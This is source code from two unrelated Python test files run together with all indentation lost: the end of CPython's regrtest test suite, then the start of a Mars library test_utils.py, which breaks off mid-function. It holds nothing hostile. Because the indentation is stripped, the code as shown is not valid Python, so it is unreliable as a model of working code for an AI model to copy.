self.assertEqual(ns.verbose, 0)
def test_two_options(self):
ns = libregrtest._parse_args(['--quiet', '--exclude'])
self.assertTrue(ns.quiet)
self.assertEqual(ns.verbose, 0)
self.assertTrue(ns.exclude)
def test_option_with_empty_string_value(self):
ns = libregrtest._parse_args(['--start', ''])
self.assertEqual(ns.start, '')
def test_arg(self):
ns = libregrtest._parse_args(['foo'])
self.assertEqual(ns.args, ['foo'])
def test_option_and_arg(self):
ns = libregrtest._parse_args(['--quiet', 'foo'])
self.assertTrue(ns.quiet)
self.assertEqual(ns.verbose, 0)
self.assertEqual(ns.args, ['foo'])
def test_arg_option_arg(self):
ns = libregrtest._parse_args(['test_unaryop', '-v', 'test_binop'])
self.assertEqual(ns.verbose, 1)
self.assertEqual(ns.args, ['test_unaryop', 'test_binop'])
def test_unknown_option(self):
self.checkError(['--unknown-option'],
'unrecognized arguments: --unknown-option')
class BaseTestCase(unittest.TestCase):
TEST_UNIQUE_ID = 1
TESTNAME_PREFIX = 'test_regrtest_'
TESTNAME_REGEX = r'test_[a-zA-Z0-9_]+'
def setUp(self):
self.testdir = os.path.realpath(os.path.dirname(__file__))
self.tmptestdir = tempfile.mkdtemp()
self.addCleanup(os_helper.rmtree, self.tmptestdir)
def create_test(self, name=None, code=None):
if not name:
name = 'noop%s' % BaseTestCase.TEST_UNIQUE_ID
BaseTestCase.TEST_UNIQUE_ID += 1
if code is None:
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_empty_test(self):
pass
""")
# test_regrtest cannot be run twice in parallel because
# of setUp() and create_test()
name = self.TESTNAME_PREFIX + name
path = os.path.join(self.tmptestdir, name + '.py')
self.addCleanup(os_helper.unlink, path)
# Use 'x' mode to ensure that we do not override existing tests
try:
with open(path, 'x', encoding='utf-8') as fp:
fp.write(code)
except PermissionError as exc:
if not sysconfig.is_python_build():
self.skipTest("cannot write %s: %s" % (path, exc))
raise
return name
def regex_search(self, regex, output):
match = re.search(regex, output, re.MULTILINE)
if not match:
self.fail("%r not found in %r" % (regex, output))
return match
def check_line(self, output, regex):
regex = re.compile(r'^' + regex, re.MULTILINE)
self.assertRegex(output, regex)
def parse_executed_tests(self, output):
regex = (r'^%s\[ *[0-9]+(?:/ *[0-9]+)*\] (%s)'
% (LOG_PREFIX, self.TESTNAME_REGEX))
parser = re.finditer(regex, output, re.MULTILINE)
return list(match.group(1) for match in parser)
def check_executed_tests(self, output, tests, skipped=(), failed=(),
env_changed=(), omitted=(),
rerun={}, no_test_ran=(),
randomize=False, interrupted=False,
fail_env_changed=False):
if isinstance(tests, str):
tests = [tests]
if isinstance(skipped, str):
skipped = [skipped]
if isinstance(failed, str):
failed = [failed]
if isinstance(env_changed, str):
env_changed = [env_changed]
if isinstance(omitted, str):
omitted = [omitted]
if isinstance(no_test_ran, str):
no_test_ran = [no_test_ran]
executed = self.parse_executed_tests(output)
if randomize:
self.assertEqual(set(executed), set(tests), output)
else:
self.assertEqual(executed, tests, output)
def plural(count):
return 's' if count != 1 else ''
def list_regex(line_format, tests):
count = len(tests)
names = ' '.join(sorted(tests))
regex = line_format % (count, plural(count))
regex = r'%s:\n %s$' % (regex, names)
return regex
if skipped:
regex = list_regex('%s test%s skipped', skipped)
self.check_line(output, regex)
if failed:
regex = list_regex('%s test%s failed', failed)
self.check_line(output, regex)
if env_changed:
regex = list_regex('%s test%s altered the execution environment',
env_changed)
self.check_line(output, regex)
if omitted:
regex = list_regex('%s test%s omitted', omitted)
self.check_line(output, regex)
if rerun:
regex = list_regex('%s re-run test%s', rerun.keys())
self.check_line(output, regex)
regex = LOG_PREFIX + r"Re-running failed tests in verbose mode"
self.check_line(output, regex)
for name, match in rerun.items():
regex = LOG_PREFIX + f"Re-running {name} in verbose mode \\(matching: {match}\\)"
self.check_line(output, regex)
if no_test_ran:
regex = list_regex('%s test%s run no tests', no_test_ran)
self.check_line(output, regex)
good = (len(tests) - len(skipped) - len(failed)
- len(omitted) - len(env_changed) - len(no_test_ran))
if good:
regex = r'%s test%s OK\.$' % (good, plural(good))
if not skipped and not failed and good > 1:
regex = 'All %s' % regex
self.check_line(output, regex)
if interrupted:
self.check_line(output, 'Test suite interrupted by signal SIGINT.')
result = []
if failed:
result.append('FAILURE')
elif fail_env_changed and env_changed:
result.append('ENV CHANGED')
if interrupted:
result.append('INTERRUPTED')
if not any((good, result, failed, interrupted, skipped,
env_changed, fail_env_changed)):
result.append("NO TEST RUN")
elif not result:
result.append('SUCCESS')
result = ', '.join(result)
if rerun:
self.check_line(output, 'Tests result: FAILURE')
result = 'FAILURE then %s' % result
self.check_line(output, 'Tests result: %s' % result)
def parse_random_seed(self, output):
match = self.regex_search(r'Using random seed ([0-9]+)', output)
randseed = int(match.group(1))
self.assertTrue(0 <= randseed <= 10000000, randseed)
return randseed
def run_command(self, args, input=None, exitcode=0, **kw):
if not input:
input = ''
if 'stderr' not in kw:
kw['stderr'] = subprocess.STDOUT
proc = subprocess.run(args,
universal_newlines=True,
input=input,
stdout=subprocess.PIPE,
**kw)
if proc.returncode != exitcode:
msg = ("Command %s failed with exit code %s\n"
"\n"
"stdout:\n"
"---\n"
"%s\n"
"---\n"
% (str(args), proc.returncode, proc.stdout))
if proc.stderr:
msg += ("\n"
"stderr:\n"
"---\n"
"%s"
"---\n"
% proc.stderr)
self.fail(msg)
return proc
def run_python(self, args, **kw):
args = [sys.executable, '-X', 'faulthandler', '-I', *args]
proc = self.run_command(args, **kw)
return proc.stdout
class CheckActualTests(BaseTestCase):
def test_finds_expected_number_of_tests(self):
"""
Check that regrtest appears to find the expected set of tests.
"""
args = ['-Wd', '-E', '-bb', '-m', 'test.regrtest', '--list-tests']
output = self.run_python(args)
rough_number_of_tests_found = len(output.splitlines())
actual_testsuite_glob = os.path.join(glob.escape(os.path.dirname(__file__)),
'test*.py')
rough_counted_test_py_files = len(glob.glob(actual_testsuite_glob))
# We're not trying to duplicate test finding logic in here,
# just give a rough estimate of how many there should be and
# be near that. This is a regression test to prevent mishaps
# such as https://bugs.python.org/issue37667 in the future.
# If you need to change the values in here during some
# mythical future test suite reorganization, don't go
# overboard with logic and keep that goal in mind.
self.assertGreater(rough_number_of_tests_found,
rough_counted_test_py_files*9//10,
msg='Unexpectedly low number of tests found in:\n'
f'{", ".join(output.splitlines())}')
class ProgramsTestCase(BaseTestCase):
"""
Test various ways to run the Python test suite. Use options close
to options used on the buildbot.
"""
NTEST = 4
def setUp(self):
super().setUp()
# Create NTEST tests doing nothing
self.tests = [self.create_test() for index in range(self.NTEST)]
self.python_args = ['-Wd', '-E', '-bb']
self.regrtest_args = ['-uall', '-rwW',
'--testdir=%s' % self.tmptestdir]
self.regrtest_args.extend(('--timeout', '3600', '-j4'))
if sys.platform == 'win32':
self.regrtest_args.append('-n')
def check_output(self, output):
self.parse_random_seed(output)
self.check_executed_tests(output, self.tests, randomize=True)
def run_tests(self, args):
output = self.run_python(args)
self.check_output(output)
def test_script_regrtest(self):
# Lib/test/regrtest.py
script = os.path.join(self.testdir, 'regrtest.py')
args = [*self.python_args, script, *self.regrtest_args, *self.tests]
self.run_tests(args)
def test_module_test(self):
# -m test
args = [*self.python_args, '-m', 'test',
*self.regrtest_args, *self.tests]
self.run_tests(args)
def test_module_regrtest(self):
# -m test.regrtest
args = [*self.python_args, '-m', 'test.regrtest',
*self.regrtest_args, *self.tests]
self.run_tests(args)
def test_module_autotest(self):
# -m test.autotest
args = [*self.python_args, '-m', 'test.autotest',
*self.regrtest_args, *self.tests]
self.run_tests(args)
def test_module_from_test_autotest(self):
# from test import autotest
code = 'from test import autotest'
args = [*self.python_args, '-c', code,
*self.regrtest_args, *self.tests]
self.run_tests(args)
def test_script_autotest(self):
# Lib/test/autotest.py
script = os.path.join(self.testdir, 'autotest.py')
args = [*self.python_args, script, *self.regrtest_args, *self.tests]
self.run_tests(args)
@unittest.skipUnless(sysconfig.is_python_build(),
'run_tests.py script is not installed')
def test_tools_script_run_tests(self):
# Tools/scripts/run_tests.py
script = os.path.join(ROOT_DIR, 'Tools', 'scripts', 'run_tests.py')
args = [script, *self.regrtest_args, *self.tests]
self.run_tests(args)
def run_batch(self, *args):
proc = self.run_command(args)
self.check_output(proc.stdout)
@unittest.skipUnless(sysconfig.is_python_build(),
'test.bat script is not installed')
@unittest.skipUnless(sys.platform == 'win32', 'Windows only')
def test_tools_buildbot_test(self):
# Tools\buildbot\test.bat
script = os.path.join(ROOT_DIR, 'Tools', 'buildbot', 'test.bat')
test_args = ['--testdir=%s' % self.tmptestdir]
if platform.machine() == 'ARM64':
test_args.append('-arm64') # ARM 64-bit build
elif platform.machine() == 'ARM':
test_args.append('-arm32') # 32-bit ARM build
elif platform.architecture()[0] == '64bit':
test_args.append('-x64') # 64-bit build
if not Py_DEBUG:
test_args.append('+d') # Release build, use python.exe
self.run_batch(script, *test_args, *self.tests)
@unittest.skipUnless(sys.platform == 'win32', 'Windows only')
def test_pcbuild_rt(self):
# PCbuild\rt.bat
script = os.path.join(ROOT_DIR, r'PCbuild\rt.bat')
if not os.path.isfile(script):
self.skipTest(f'File "{script}" does not exist')
rt_args = ["-q"] # Quick, don't run tests twice
if platform.machine() == 'ARM64':
rt_args.append('-arm64') # ARM 64-bit build
elif platform.machine() == 'ARM':
rt_args.append('-arm32') # 32-bit ARM build
elif platform.architecture()[0] == '64bit':
rt_args.append('-x64') # 64-bit build
if Py_DEBUG:
rt_args.append('-d') # Debug build, use python_d.exe
self.run_batch(script, *rt_args, *self.regrtest_args, *self.tests)
class ArgsTestCase(BaseTestCase):
"""
Test arguments of the Python test suite.
"""
def run_tests(self, *testargs, **kw):
cmdargs = ['-m', 'test', '--testdir=%s' % self.tmptestdir, *testargs]
return self.run_python(cmdargs, **kw)
def test_failing_test(self):
# test a failing test
code = textwrap.dedent("""
import unittest
class FailingTest(unittest.TestCase):
def test_failing(self):
self.fail("bug")
""")
test_ok = self.create_test('ok')
test_failing = self.create_test('failing', code=code)
tests = [test_ok, test_failing]
output = self.run_tests(*tests, exitcode=2)
self.check_executed_tests(output, tests, failed=test_failing)
def test_resources(self):
# test -u command line option
tests = {}
for resource in ('audio', 'network'):
code = textwrap.dedent("""
from test import support; support.requires(%r)
import unittest
class PassingTest(unittest.TestCase):
def test_pass(self):
pass
""" % resource)
tests[resource] = self.create_test(resource, code)
test_names = sorted(tests.values())
# -u all: 2 resources enabled
output = self.run_tests('-u', 'all', *test_names)
self.check_executed_tests(output, test_names)
# -u audio: 1 resource enabled
output = self.run_tests('-uaudio', *test_names)
self.check_executed_tests(output, test_names,
skipped=tests['network'])
# no option: 0 resources enabled
output = self.run_tests(*test_names)
self.check_executed_tests(output, test_names,
skipped=test_names)
def test_random(self):
# test -r and --randseed command line option
code = textwrap.dedent("""
import random
print("TESTRANDOM: %s" % random.randint(1, 1000))
""")
test = self.create_test('random', code)
# first run to get the output with the random seed
output = self.run_tests('-r', test)
randseed = self.parse_random_seed(output)
match = self.regex_search(r'TESTRANDOM: ([0-9]+)', output)
test_random = int(match.group(1))
# try to reproduce with the random seed
output = self.run_tests('-r', '--randseed=%s' % randseed, test)
randseed2 = self.parse_random_seed(output)
self.assertEqual(randseed2, randseed)
match = self.regex_search(r'TESTRANDOM: ([0-9]+)', output)
test_random2 = int(match.group(1))
self.assertEqual(test_random2, test_random)
def test_fromfile(self):
# test --fromfile
tests = [self.create_test() for index in range(5)]
# Write the list of files using a format similar to regrtest output:
# [1/2] test_1
# [2/2] test_2
filename = os_helper.TESTFN
self.addCleanup(os_helper.unlink, filename)
# test format '0:00:00 [2/7] test_opcodes -- test_grammar took 0 sec'
with open(filename, "w") as fp:
previous = None
for index, name in enumerate(tests, 1):
line = ("00:00:%02i [%s/%s] %s"
% (index, index, len(tests), name))
if previous:
line += " -- %s took 0 sec" % previous
print(line, file=fp)
previous = name
output = self.run_tests('--fromfile', filename)
self.check_executed_tests(output, tests)
# test format '[2/7] test_opcodes'
with open(filename, "w") as fp:
for index, name in enumerate(tests, 1):
print("[%s/%s] %s" % (index, len(tests), name), file=fp)
output = self.run_tests('--fromfile', filename)
self.check_executed_tests(output, tests)
# test format 'test_opcodes'
with open(filename, "w") as fp:
for name in tests:
print(name, file=fp)
output = self.run_tests('--fromfile', filename)
self.check_executed_tests(output, tests)
# test format 'Lib/test/test_opcodes.py'
with open(filename, "w") as fp:
for name in tests:
print('Lib/test/%s.py' % name, file=fp)
output = self.run_tests('--fromfile', filename)
self.check_executed_tests(output, tests)
def test_interrupted(self):
code = TEST_INTERRUPTED
test = self.create_test('sigint', code=code)
output = self.run_tests(test, exitcode=130)
self.check_executed_tests(output, test, omitted=test,
interrupted=True)
def test_slowest(self):
# test --slowest
tests = [self.create_test() for index in range(3)]
output = self.run_tests("--slowest", *tests)
self.check_executed_tests(output, tests)
regex = ('10 slowest tests:\n'
'(?:- %s: .*\n){%s}'
% (self.TESTNAME_REGEX, len(tests)))
self.check_line(output, regex)
def test_slowest_interrupted(self):
# Issue #25373: test --slowest with an interrupted test
code = TEST_INTERRUPTED
test = self.create_test("sigint", code=code)
for multiprocessing in (False, True):
with self.subTest(multiprocessing=multiprocessing):
if multiprocessing:
args = ("--slowest", "-j2", test)
else:
args = ("--slowest", test)
output = self.run_tests(*args, exitcode=130)
self.check_executed_tests(output, test,
omitted=test, interrupted=True)
regex = ('10 slowest tests:\n')
self.check_line(output, regex)
def test_coverage(self):
# test --coverage
test = self.create_test('coverage')
output = self.run_tests("--coverage", test)
self.check_executed_tests(output, [test])
regex = (r'lines +cov% +module +\(path\)\n'
r'(?: *[0-9]+ *[0-9]{1,2}% *[^ ]+ +\([^)]+\)+)+')
self.check_line(output, regex)
def test_wait(self):
# test --wait
test = self.create_test('wait')
output = self.run_tests("--wait", test, input='key')
self.check_line(output, 'Press any key to continue')
def test_forever(self):
# test --forever
code = textwrap.dedent("""
import builtins
import unittest
class ForeverTester(unittest.TestCase):
def test_run(self):
# Store the state in the builtins module, because the test
                    # module is reloaded at each run
if 'RUN' in builtins.__dict__:
builtins.__dict__['RUN'] += 1
if builtins.__dict__['RUN'] >= 3:
self.fail("fail at the 3rd runs")
else:
builtins.__dict__['RUN'] = 1
""")
test = self.create_test('forever', code=code)
output = self.run_tests('--forever', test, exitcode=2)
self.check_executed_tests(output, [test]*3, failed=test)
def check_leak(self, code, what):
test = self.create_test('huntrleaks', code=code)
filename = 'reflog.txt'
self.addCleanup(os_helper.unlink, filename)
output = self.run_tests('--huntrleaks', '3:3:', test,
exitcode=2,
stderr=subprocess.STDOUT)
self.check_executed_tests(output, [test], failed=test)
line = 'beginning 6 repetitions\n123456\n......\n'
self.check_line(output, re.escape(line))
line2 = '%s leaked [1, 1, 1] %s, sum=3\n' % (test, what)
self.assertIn(line2, output)
with open(filename) as fp:
reflog = fp.read()
self.assertIn(line2, reflog)
@unittest.skipUnless(Py_DEBUG, 'need a debug build')
def test_huntrleaks(self):
# test --huntrleaks
code = textwrap.dedent("""
import unittest
GLOBAL_LIST = []
class RefLeakTest(unittest.TestCase):
def test_leak(self):
GLOBAL_LIST.append(object())
""")
self.check_leak(code, 'references')
@unittest.skipUnless(Py_DEBUG, 'need a debug build')
def test_huntrleaks_fd_leak(self):
# test --huntrleaks for file descriptor leak
code = textwrap.dedent("""
import os
import unittest
class FDLeakTest(unittest.TestCase):
def test_leak(self):
fd = os.open(__file__, os.O_RDONLY)
# bug: never close the file descriptor
""")
self.check_leak(code, 'file descriptors')
def test_list_tests(self):
# test --list-tests
tests = [self.create_test() for i in range(5)]
output = self.run_tests('--list-tests', *tests)
self.assertEqual(output.rstrip().splitlines(),
tests)
def test_list_cases(self):
# test --list-cases
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_method1(self):
pass
def test_method2(self):
pass
""")
testname = self.create_test(code=code)
# Test --list-cases
all_methods = ['%s.Tests.test_method1' % testname,
'%s.Tests.test_method2' % testname]
output = self.run_tests('--list-cases', testname)
self.assertEqual(output.splitlines(), all_methods)
# Test --list-cases with --match
all_methods = ['%s.Tests.test_method1' % testname]
output = self.run_tests('--list-cases',
'-m', 'test_method1',
testname)
self.assertEqual(output.splitlines(), all_methods)
@support.cpython_only
def test_crashed(self):
# Any code which causes a crash
code = 'import faulthandler; faulthandler._sigsegv()'
crash_test = self.create_test(name="crash", code=code)
tests = [crash_test]
output = self.run_tests("-j2", *tests, exitcode=2)
self.check_executed_tests(output, tests, failed=crash_test,
randomize=True)
def parse_methods(self, output):
regex = re.compile("^(test[^ ]+).*ok$", flags=re.MULTILINE)
return [match.group(1) for match in regex.finditer(output)]
def test_ignorefile(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_method1(self):
pass
def test_method2(self):
pass
def test_method3(self):
pass
def test_method4(self):
pass
""")
all_methods = ['test_method1', 'test_method2',
'test_method3', 'test_method4']
testname = self.create_test(code=code)
# only run a subset
filename = os_helper.TESTFN
self.addCleanup(os_helper.unlink, filename)
subset = [
# only ignore the method name
'test_method1',
# ignore the full identifier
'%s.Tests.test_method3' % testname]
with open(filename, "w") as fp:
for name in subset:
print(name, file=fp)
output = self.run_tests("-v", "--ignorefile", filename, testname)
methods = self.parse_methods(output)
subset = ['test_method2', 'test_method4']
self.assertEqual(methods, subset)
def test_matchfile(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_method1(self):
pass
def test_method2(self):
pass
def test_method3(self):
pass
def test_method4(self):
pass
""")
all_methods = ['test_method1', 'test_method2',
'test_method3', 'test_method4']
testname = self.create_test(code=code)
# by default, all methods should be run
output = self.run_tests("-v", testname)
methods = self.parse_methods(output)
self.assertEqual(methods, all_methods)
# only run a subset
filename = os_helper.TESTFN
self.addCleanup(os_helper.unlink, filename)
subset = [
# only match the method name
'test_method1',
# match the full identifier
'%s.Tests.test_method3' % testname]
with open(filename, "w") as fp:
for name in subset:
print(name, file=fp)
output = self.run_tests("-v", "--matchfile", filename, testname)
methods = self.parse_methods(output)
subset = ['test_method1', 'test_method3']
self.assertEqual(methods, subset)
def test_env_changed(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_env_changed(self):
open("env_changed", "w").close()
""")
testname = self.create_test(code=code)
# don't fail by default
output = self.run_tests(testname)
self.check_executed_tests(output, [testname], env_changed=testname)
# fail with --fail-env-changed
output = self.run_tests("--fail-env-changed", testname, exitcode=3)
self.check_executed_tests(output, [testname], env_changed=testname,
fail_env_changed=True)
def test_rerun_fail(self):
# FAILURE then FAILURE
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_succeed(self):
return
def test_fail_always(self):
# test that always fails
self.fail("bug")
""")
testname = self.create_test(code=code)
output = self.run_tests("-w", testname, exitcode=2)
self.check_executed_tests(output, [testname],
failed=testname, rerun={testname: "test_fail_always"})
def test_rerun_success(self):
# FAILURE then SUCCESS
code = textwrap.dedent("""
import builtins
import unittest
class Tests(unittest.TestCase):
def test_succeed(self):
return
def test_fail_once(self):
if not hasattr(builtins, '_test_failed'):
builtins._test_failed = True
self.fail("bug")
""")
testname = self.create_test(code=code)
output = self.run_tests("-w", testname, exitcode=0)
self.check_executed_tests(output, [testname],
rerun={testname: "test_fail_once"})
def test_no_tests_ran(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_bug(self):
pass
""")
testname = self.create_test(code=code)
output = self.run_tests(testname, "-m", "nosuchtest", exitcode=0)
self.check_executed_tests(output, [testname], no_test_ran=testname)
def test_no_tests_ran_skip(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_skipped(self):
self.skipTest("because")
""")
testname = self.create_test(code=code)
output = self.run_tests(testname, exitcode=0)
self.check_executed_tests(output, [testname])
def test_no_tests_ran_multiple_tests_nonexistent(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_bug(self):
pass
""")
testname = self.create_test(code=code)
testname2 = self.create_test(code=code)
output = self.run_tests(testname, testname2, "-m", "nosuchtest", exitcode=0)
self.check_executed_tests(output, [testname, testname2],
no_test_ran=[testname, testname2])
def test_no_test_ran_some_test_exist_some_not(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_bug(self):
pass
""")
testname = self.create_test(code=code)
other_code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_other_bug(self):
pass
""")
testname2 = self.create_test(code=other_code)
output = self.run_tests(testname, testname2, "-m", "nosuchtest",
"-m", "test_other_bug", exitcode=0)
self.check_executed_tests(output, [testname, testname2],
no_test_ran=[testname])
@support.cpython_only
def test_uncollectable(self):
code = textwrap.dedent(r"""
import _testcapi
import gc
import unittest
@_testcapi.with_tp_del
class Garbage:
def __tp_del__(self):
pass
class Tests(unittest.TestCase):
def test_garbage(self):
# create an uncollectable object
obj = Garbage()
obj.ref_cycle = obj
obj = None
""")
testname = self.create_test(code=code)
output = self.run_tests("--fail-env-changed", testname, exitcode=3)
self.check_executed_tests(output, [testname],
env_changed=[testname],
fail_env_changed=True)
def test_multiprocessing_timeout(self):
code = textwrap.dedent(r"""
import time
import unittest
try:
import faulthandler
except ImportError:
faulthandler = None
class Tests(unittest.TestCase):
# test hangs and so should be stopped by the timeout
def test_sleep(self):
# we want to test regrtest multiprocessing timeout,
# not faulthandler timeout
if faulthandler is not None:
faulthandler.cancel_dump_traceback_later()
time.sleep(60 * 5)
""")
testname = self.create_test(code=code)
output = self.run_tests("-j2", "--timeout=1.0", testname, exitcode=2)
self.check_executed_tests(output, [testname],
failed=testname)
self.assertRegex(output,
re.compile('%s timed out' % testname, re.MULTILINE))
def test_unraisable_exc(self):
# --fail-env-changed must catch unraisable exception.
# The exception must be displayed even if sys.stderr is redirected.
code = textwrap.dedent(r"""
import unittest
import weakref
from test.support import captured_stderr
class MyObject:
pass
def weakref_callback(obj):
raise Exception("weakref callback bug")
class Tests(unittest.TestCase):
def test_unraisable_exc(self):
obj = MyObject()
ref = weakref.ref(obj, weakref_callback)
with captured_stderr() as stderr:
# call weakref_callback() which logs
# an unraisable exception
obj = None
self.assertEqual(stderr.getvalue(), '')
""")
testname = self.create_test(code=code)
output = self.run_tests("--fail-env-changed", "-v", testname, exitcode=3)
self.check_executed_tests(output, [testname],
env_changed=[testname],
fail_env_changed=True)
self.assertIn("Warning -- Unraisable exception", output)
self.assertIn("Exception: weakref callback bug", output)
def test_threading_excepthook(self):
# --fail-env-changed must catch uncaught thread exception.
# The exception must be displayed even if sys.stderr is redirected.
code = textwrap.dedent(r"""
import threading
import unittest
from test.support import captured_stderr
class MyObject:
pass
def func_bug():
raise Exception("bug in thread")
class Tests(unittest.TestCase):
def test_threading_excepthook(self):
with captured_stderr() as stderr:
thread = threading.Thread(target=func_bug)
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
""")
testname = self.create_test(code=code)
output = self.run_tests("--fail-env-changed", "-v", testname, exitcode=3)
self.check_executed_tests(output, [testname],
env_changed=[testname],
fail_env_changed=True)
self.assertIn("Warning -- Uncaught thread exception", output)
self.assertIn("Exception: bug in thread", output)
def test_print_warning(self):
# bpo-45410: The order of messages must be preserved when -W and
# support.print_warning() are used.
code = textwrap.dedent(r"""
import sys
import unittest
from test import support
class MyObject:
pass
def func_bug():
raise Exception("bug in thread")
class Tests(unittest.TestCase):
def test_print_warning(self):
print("msg1: stdout")
support.print_warning("msg2: print_warning")
# Fail with ENV CHANGED to see print_warning() log
support.environment_altered = True
""")
testname = self.create_test(code=code)
# Expect an output like:
#
# test_threading_excepthook (test.test_x.Tests) ... msg1: stdout
# Warning -- msg2: print_warning
# ok
regex = (r"test_print_warning.*msg1: stdout\n"
r"Warning -- msg2: print_warning\n"
r"ok\n")
for option in ("-v", "-W"):
with self.subTest(option=option):
cmd = ["--fail-env-changed", option, testname]
output = self.run_tests(*cmd, exitcode=3)
self.check_executed_tests(output, [testname],
env_changed=[testname],
fail_env_changed=True)
self.assertRegex(output, regex)
def test_unicode_guard_env(self):
guard = os.environ.get(setup.UNICODE_GUARD_ENV)
self.assertIsNotNone(guard, f"{setup.UNICODE_GUARD_ENV} not set")
if guard.isascii():
# Skip to signify that the env var value was changed by the user;
# possibly to something ASCII to work around Unicode issues.
self.skipTest("Modified guard")
def test_cleanup(self):
dirname = os.path.join(self.tmptestdir, "test_python_123")
os.mkdir(dirname)
filename = os.path.join(self.tmptestdir, "test_python_456")
open(filename, "wb").close()
names = [dirname, filename]
cmdargs = ['-m', 'test',
'--tempdir=%s' % self.tmptestdir,
'--cleanup']
self.run_python(cmdargs)
for name in names:
self.assertFalse(os.path.exists(name), name)
class TestUtils(unittest.TestCase):
def test_format_duration(self):
self.assertEqual(utils.format_duration(0),
'0 ms')
self.assertEqual(utils.format_duration(1e-9),
'1 ms')
self.assertEqual(utils.format_duration(10e-3),
'10 ms')
self.assertEqual(utils.format_duration(1.5),
'1.5 sec')
self.assertEqual(utils.format_duration(1),
'1.0 sec')
self.assertEqual(utils.format_duration(2 * 60),
'2 min')
self.assertEqual(utils.format_duration(2 * 60 + 1),
'2 min 1 sec')
self.assertEqual(utils.format_duration(3 * 3600),
'3 hour')
self.assertEqual(utils.format_duration(3 * 3600 + 2 * 60 + 1),
'3 hour 2 min')
self.assertEqual(utils.format_duration(3 * 3600 + 1),
'3 hour 1 sec')
if __name__ == '__main__':
unittest.main()
|
test_utils.py
|
# -*- coding: utf-8 -*-
# Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import copy
import logging
import multiprocessing
import os
import shutil
import sys
import tempfile
import textwrap
import time
from concurrent.futures import ThreadPoolExecutor
from functools import partial
from io import BytesIO
from enum import Enum
import numpy as np
try:
import pandas as pd
except ImportError: # pragma: no cover
pd = None
import pytest
from .. import dataframe as md
from .. import tensor as mt
from .. import utils
from ..core import tile, TileableGraph
from ..serialization.ray import register_ray_serializers
from .core import require_ray
def test_string_conversion():
s = None
assert utils.to_binary(s) is None
assert utils.to_str(s) is None
assert utils.to_text(s) is None
s = "abcdefg"
assert isinstance(utils.to_binary(s), bytes)
assert utils.to_binary(s) == b"abcdefg"
assert isinstance(utils.to_str(s), str)
assert utils.to_str(s) == "abcdefg"
assert isinstance(utils.to_text(s), str)
assert utils.to_text(s) == "abcdefg"
ustr = type("ustr", (str,), {})
assert isinstance(utils.to_str(ustr(s)), str)
assert utils.to_str(ustr(s)) == "abcdefg"
s = b"abcdefg"
assert isinstance(utils.to_binary(s), bytes)
assert utils.to_binary(s) == b"abcdefg"
assert isinstance(utils.to_str(s), str)
assert utils.to_str(s) == "abcdefg"
assert isinstance(utils.to_text(s), str)
assert utils.to_text(s) == "abcdefg"
ubytes = type("ubytes", (bytes,), {})
assert isinstance(utils.to_binary(ubytes(s)), bytes)
assert utils.to_binary(ubytes(s)) == b"abcdefg"
s = "abcdefg"
assert isinstance(utils.to_binary(s), bytes)
assert utils.to_binary(s) == b"abcdefg"
assert isinstance(utils.to_str(s), str)
assert utils.to_str(s) == "abcdefg"
assert isinstance(utils.to_text(s), str)
assert utils.to_text(s) == "abcdefg"
uunicode = type("uunicode", (str,), {})
assert isinstance(utils.to_text(uunicode(s)), str)
assert utils.to_text(uunicode(s)) == "abcdefg"
with pytest.raises(TypeError):
utils.to_binary(utils)
with pytest.raises(TypeError):
utils.to_str(utils)
with pytest.raises(TypeError):
utils.to_text(utils)
def test_tokenize():
import shutil
import tempfile
class TestEnum(Enum):
VAL1 = "val1"
tempdir = tempfile.mkdtemp("mars_test_utils_")
try:
filename = os.path.join(tempdir, "test_npa.dat")
mmp_array = np.memmap(filename, dtype=float, mode="w+", shape=(3, 4))
mmp_array[:] = np.random.random((3, 4)).astype(float)
mmp_array.flush()
del mmp_array
mmp_array1 = np.memmap(filename, dtype=float, shape=(3, 4))
mmp_array2 = np.memmap(filename, dtype=float, shape=(3, 4))
try:
v = [
1,
2.3,
"456",
"789",
b"101112",
2147483649,
None,
np.ndarray,
[912, "uvw"],
np.arange(0, 10),
np.array(10),
np.array([b"\x01\x32\xff"]),
np.int64,
TestEnum.VAL1,
]
copy_v = copy.deepcopy(v)
assert utils.tokenize(v + [mmp_array1], ext_data=1234) == utils.tokenize(
copy_v + [mmp_array2], ext_data=1234
)
finally:
del mmp_array1, mmp_array2
finally:
shutil.rmtree(tempdir)
v = {"a", "xyz", "uvw"}
assert utils.tokenize(v) == utils.tokenize(copy.deepcopy(v))
v = dict(x="abcd", y=98765)
assert utils.tokenize(v) == utils.tokenize(copy.deepcopy(v))
v = dict(x=dict(a=1, b=[1, 2, 3]), y=12345)
assert utils.tokenize(v) == utils.tokenize(copy.deepcopy(v))
# pandas-related objects
if pd is not None:
df = pd.DataFrame(
[[utils.to_binary("测试"), utils.to_text("数据")]],
index=["a"],
columns=["中文", "data"],
)
v = [df, df.index, df.columns, df["data"], pd.Categorical(list("ABCD"))]
assert utils.tokenize(v) == utils.tokenize(copy.deepcopy(v))
class NonTokenizableCls:
def __getstate__(self):
raise SystemError
with pytest.raises(TypeError):
utils.tokenize(NonTokenizableCls())
class CustomizedTokenize(object):
def __mars_tokenize__(self):
return id(type(self)), id(NonTokenizableCls)
assert utils.tokenize(CustomizedTokenize()) == utils.tokenize(CustomizedTokenize())
v = lambda x: x + 1
assert utils.tokenize(v) == utils.tokenize(copy.deepcopy(v))
def f(a, b):
return np.add(a, b)
